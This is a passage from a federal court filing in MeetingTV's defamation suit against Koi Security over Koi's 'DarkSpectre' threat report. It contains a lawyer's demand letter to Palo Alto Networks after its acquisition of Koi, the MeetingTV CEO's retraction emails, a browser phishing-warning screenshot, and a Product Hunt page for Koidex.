We write regarding Palo Alto Networks Inc.'s ("Palo Alto Networks" or "PANW") announced completion of its acquisition of Koi Security Inc. ("Koi") on April 14, 2026.

As you are now aware, Koi is a defendant in the above-referenced federal action brought by MeetingTV Inc. ("MeetingTV"), arising from Koi's publication of false and defamatory statements, including allegations that MeetingTV was involved in malware distribution, corporate espionage, and coordinated activity with a purported Chinese threat actor. These statements were published in Koi's "DarkSpectre" report and disseminated through associated threat intelligence systems, including Koidex.

## 1. Notice of Liability and Successor Exposure

By virtue of the completed acquisition, Palo Alto Networks has assumed, or is subject to, liability arising from Koi's conduct under well-established doctrines, including but not limited to:

- Successor liability (including merger-based or continuity-based liability)
- Ratification and adoption of prior statements
- Republication through continued distribution, integration, or promotion of Koi's technology and outputs
- Ongoing tortious and statutory violations, including under the Lanham Act (15 U.S.C. § 1125(a))

PANW's public statements confirm that Koi's technology is being integrated into Palo Alto Networks' products and will continue to be deployed and distributed at scale. This integration materially increases the scope and impact of the harmful statements at issue.

154

Bruce Byrd
April 15, 2026
Page 2

## 2. Ongoing Publication and Continuing Harm

Despite Koi's limited and incomplete "update," false and harmful classifications tied to MeetingTV-controlled software, endpoints, infrastructure - including but not limited to meetingtv[.]us, webinarstvus.cloudfunctions[.]net, and zoocorder.firebaseio[.]com - continue to propagate through security ecosystems.  These classifications have foreseeably resulted in:

- Global blocking by security vendors, ISPs, and enterprise systems
- Disruption of MeetingTV's services to both new and existing users
- Severe reputational harm, including persistent association with "malware," "cybercrime," and "Chinese threat actors"
- Ongoing economic damages that continue to accrue daily

To the extent Palo Alto Networks continues to operate, distribute, integrate, or rely upon Koi-derived data, models, or threat intelligence without full correction and retraction, Palo Alto Networks is engaging in **ongoing publication** and **continuing the harm at issue**.

## 3. Actual Notice and Duty to Remediate

Palo Alto Networks now has actual notice of:

- The falsity of the statements at issue
- The specific technical errors underlying those statements
- The ongoing downstream impact of IOC designation within automated security systems
- The inadequacy of Koi's prior "update" and failure to notify affected vendors and platforms

With this knowledge, Palo Alto Networks has both the ability and obligation to take immediate corrective action. Failure to do so will support claims for enhanced damages, including punitive damages, based on knowing or reckless continuation of harmful conduct.

## 4. Demand for Immediate Action

MeetingTV hereby demands that Palo Alto Networks:

- Immediately cease any continued publication, distribution, or reliance upon false or unverified statements concerning MeetingTV
- Conduct a full audit of all Koi-derived data, classifications, models, and outputs incorporated into Palo Alto Networks systems
- Issue a formal, public, and timestamped retraction of all false statements concerning MeetingTV
- Provide direct notice of such retraction and correction to all downstream vendors, partners, and threat intelligence consumers who may have ingested or relied upon Koi's prior publications
- Remove or correct all references to MeetingTV and its infrastructure from all Palo Alto Networks-controlled systems, databases, and products
- Preserve all documents, communications, diligence materials, integration plans, and technical artifacts relating to Koi, the DarkSpectre report, and MeetingTV

Bruce Byrd
April 15, 2026
Page 3

     Nothing in this letter constitutes a waiver of any rights or remedies, all of which are expressly reserved.

     MeetingTV requests a response no later than **seven (7) days** from the date of this letter.

Sincerely,

/s/ Brad Moores

BKM
cc: Client

# EXHIBIT 26

From: **Michael Robertson** <mr@michaelrobertson.com>
Date: Wed, Feb 11, 2026 at 5:46 PM
Subject: Formal Demand for Retraction – Defamatory Publication Dated December 30, 2025
To: <hello@koi.ai>


Formal Demand for Retraction – Defamatory Publication Dated December 30, 2025

To Whom It May Concern:

On December 30, 2025, Koi AI authored and published an article titled:
"DarkSpectre: Unmasking the Threat Actor Behind 7.8 Million Infected Browsers."
The article falsely states and/or implies, among other things, that MeetingTV:
Is affiliated with a criminal Chinese organization
Acts in concert with ShadyPanda and DarkSpectre
Shares infrastructure with malicious actors
Shares data with Chinese entities
Works with extensions that connect to infinitynewtab

These allegations are false. MeetingTV has never had any relationship — past or present — with any such entities. No data was ever shared with any third party.

The article was published without contacting MeetingTV for verification.

As a direct result of your publication:
DNSFilter and other vendors have categorized MeetingTV as malware.
ISPs and network security companies have blocked traffic.
MeetingTV has suffered substantial economic damage.

This letter constitutes a formal demand for:
Immediate removal of the publication.

Publication of a full retraction;
Written confirmation within 7 days.
Preservation of all documents (litigation hold).

Failure to comply will result in immediate filing of a lawsuit seeking compensatory and punitive damages exceeding ████████

Nothing herein waives any rights.

- Michael Robertson
CEO, MeetingTV

# EXHIBIT 27

From: **Michael Robertson** <mr@michaelrobertson.com>
Date: Thu, Feb 12, 2026 at 5:14 AM
Subject: Fwd: Formal Demand for Retraction – Defamatory Publication Dated December 30, 2025
To: <amit.assaraf@koi.ai>

Amit,

Wanted to make sure you saw this demand regarding this ultra serious issue. The blog post your company did talking about my company MeetingTV was false and defamatory and did considerable damage which is increasing every day.

-- mr

---------- Forwarded message ---------
From: **Michael Robertson** <mr@michaelrobertson.com>
Date: Wed, Feb 11, 2026, 5:46 PM
Subject: Formal Demand for Retraction – Defamatory Publication Dated December 30, 2025
To: <hello@koi.ai>

Formal Demand for Retraction – Defamatory Publication Dated December 30, 2025

To Whom It May Concern:

On December 30, 2025, Koi AI authored and published an article titled:
"DarkSpectre: Unmasking the Threat Actor Behind 7.8 Million Infected Browsers."
The article falsely states and/or implies, among other things, that MeetingTV:
Is affiliated with a criminal Chinese organization
Acts in concert with ShadyPanda and DarkSpectre
Shares infrastructure with malicious actors
Shares data with Chinese entities
Works with extensions that connect to infinitynewtab

These allegations are false. MeetingTV has never had any relationship — past or present — with any such entities. No data was ever shared with any third party.

The article was published without contacting MeetingTV for verification.

As a direct result of your publication:
DNSFilter and other vendors have categorized MeetingTV as malware.
ISPs and network security companies have blocked traffic.
MeetingTV has suffered substantial economic damage.

This letter constitutes a formal demand for:
Immediate removal of the publication.

Publication of a full retraction;
Written confirmation within 7 days.
Preservation of all documents (litigation hold).

Failure to comply will result in immediate filing of a lawsuit seeking compensatory and punitive damages exceeding ▓▓▓▓▓▓

Nothing herein waives any rights.

- Michael Robertson
CEO, MeetingTV

# EXHIBIT 28

From: **Michael Robertson** <mr@michaelrobertson.com>
Date: Thu, Feb 12, 2026 at 6:08 AM
Subject: Re: Fwd: Formal Demand for Retraction – Defamatory Publication Dated December 30, 2025
To: Amit Assaraf <amit@koi.ai>


Amit,

It's shockingly irresponsible nobody contacted us prior to publishing this damaging and false article. We have prominent contact info - which is the opposite of what bad players do. We don't play in the shadows. We're a law abiding US Corp.

We're now blocked all over the world with no chance to remedy it. Security companies have blackballed us. Customers can't reach us. Partners won't talk to us. All because of bogus allegations were working with Chinese criminals. So wrong. So damaging.

-- mr

WebinarTV.us - World's Best Webinars

On Thu, Feb 12, 2026, 5:40 AM Amit Assaraf <amit@koi.ai> wrote:
 Hey Michael,

 I missed your email, let me look into this, we did not mean to cause any harm and I'll make sure to fix this asap internally.

 Best,

 ---
 **Amit Assaraf**
 CEO • **Koi**
 +972 50 596 4411 | +1 646 351 9882



 Sent via Superhuman

# EXHIBIT 29

From: **Michael Robertson** <mr@michaelrobertson.com>
Date: Thu, Feb 12, 2026 at 6:58 AM
Subject: Re: Fwd: Formal Demand for Retraction – Defamatory Publication Dated December 30, 2025
To: Amit Assaraf <amit@koi.ai>
Cc: Idan Dardikman <idan@koi.ai>

Amit,

This is insufficient. There are many false claims in your blog such as there is shared infrastructure and data being transmitted to Chinese criminals.

In addition, your post says zoom meetings are stolen and cite these URLs:

Domains - The Zoom Stealer
webinarstvus.cloudfunctions[.]net
zoocorder.firebaseio[.]com

This is false and defamatory. WebinarTV indexes free and public webinars. Public means available to everyone in the world. Nothing is stolen. The information is on public web pages and available to all search engines to index. Your company mischaracterizes this as stolen corporate intelligence.

Zoomcorder is a personal subscription service. Meetings are recorded by individual subscribers and are stored only for a short time so the subscriber can download them. They are not archived or transmitted or sold to others as your cite states.

Because of the many false claims on your site, we are blocked in many places. Our customers can't connect and that doesn't change because you add a footnote to a lengthy blog. We remain blocked.

Please have your security company contact all the security and networking companies now blocking us after your article was published and ask them to remove the block.

-- mr

WebinarTV.us - World's Best Webinars

# EXHIBIT 30





# Hold on, this website isn't safe

This is a **phishing site** – a fake site that tries to steal your sensitive info (passwords, credit card numbers, and more). We recommend avoiding the site completely.



AVOID SITE

Continue anyway

# EXHIBIT 31

 **P**    Search ( ⌘    Best Products ⌄    Launches ⌄    News ⌄    Forums ⌄    ✉ Subscr



# Koidex

Know if a package, extension, or AI model is actually safe

605 followers

### Visit website

⊞ Security software

Koidex helps you answer one question fast: "Is this safe to install?". Search extensions, code packages, and AI models across VS Code, JetBrains, npm, and Hugging Face. You can also install the Koidex IDE extension for real-time background scanning in Cursor and Windsurf. Free, no setup.

Overview    Reviews    Alternatives    Team    Awards    More





Free Options

Launch tags: 🏷 Productivity · Developer Tools · Security

 **Launch Team**

Case 3:26-cv-01705-AJB-MMP    Document 23    Filed 05/13/26    PageID.979
of 171

 **P**        Best
                    Products  ⌄      Launches  ⌄       News  ⌄      Forums  ⌄      ✉ Subsc

---

      **Wispr Flow: Dictation That Works Everywhere**

Stop typing. Start speaking. 4x faster.

Promoted

---

What do you think? ...

@                                                    **Login to comment**

---



**Amit Assaraf**  koidex    Maker  📌

👋 Hey Product Hunt! I'm Amit, Co-founder of Koi.

Today we're launching **Koidex**. It helps you quickly check whether a package, extension, or AI model looks safe before it enters your stack.

Try it here: **Koidex →** https://dex.koi.security/?ref=producthunt

📖 **Why We Built It**

We're the research team behind the discoveries of GlassWorm, ShadyPanda, and PhantomRaven, and we've seen how easily malicious code hides in "normal" developer tooling.
To prove how fast these blind spots get targeted, we ran a blunt test: we published a harmless lookalike VS Code theme and saw installs from large-company networks within 30 minutes. The industry knows these threats exist, but workflows haven't changed. That was the moment we realized: **"one-click install" needs "one-click due diligence."**

💡 **What You Can Do With Koidex Today**

- 🔍 **Unified Search:** One place to check VS Code, Chrome, JetBrains, npm, and Hugging Face, and more.
- 🧠 **Behavior-Based Scoring:** Focuses on what the code *actually does*, not just what

Show more



Best
Products ⌄     Launches ⌄     News ⌄     Forums ⌄     ✉ Subsc

---

@amitassaraf

One question: do you plan to expand support for scanning MCP servers and AI agent tools? With the growing adoption of autonomous agents, that seems like the next big risk vector.

⊖

⌃ (3)    ⚑    ⬆    2mo ago    ⋯

 **Daniel Slavin** ✅  KOIDEX    Maker

@martingebara  We're opening early access for MCP scanning next week, and then expanding from there. If you want in, DM me what MCP/agent ecosystem you're using and we'll loop you in.

⌃ (2)    ⚑    ⬆    2mo ago    ⋯

 **Gorkem Cetin**

@amitassaraf do you provide APIs to give services to other 3rd parties?

⌃    ⚑    ⬆    2mo ago    ⋯

 **Kimberly Ross**

@amitassaraf Hi Amit. I'm somewhat of a beginner in AI. Still learning the ropes, so I am curious to know how do you evaluate whether an AI model is safe? Are you checking for malicious code, biased outputs, or unsafe behaviors?

⌃    ⚑    ⬆    2mo ago    ⋯

 **Kumar Abhishek** ✅

How does it exactly work? I tried to input name of a chrome extension but it said "No items found matching your search". Does that mean it is not safe?

⊖    ⌃ (1)    ⚑    ⬆    2mo ago    ⋯

 **Daniel Slavin** ✅  KOIDEX    Maker

Hey @zerotox - thanks for checking it out 🙏
"No items found" doesn't mean it's unsafe. It just means we didn't find a match for that search in the source you selected.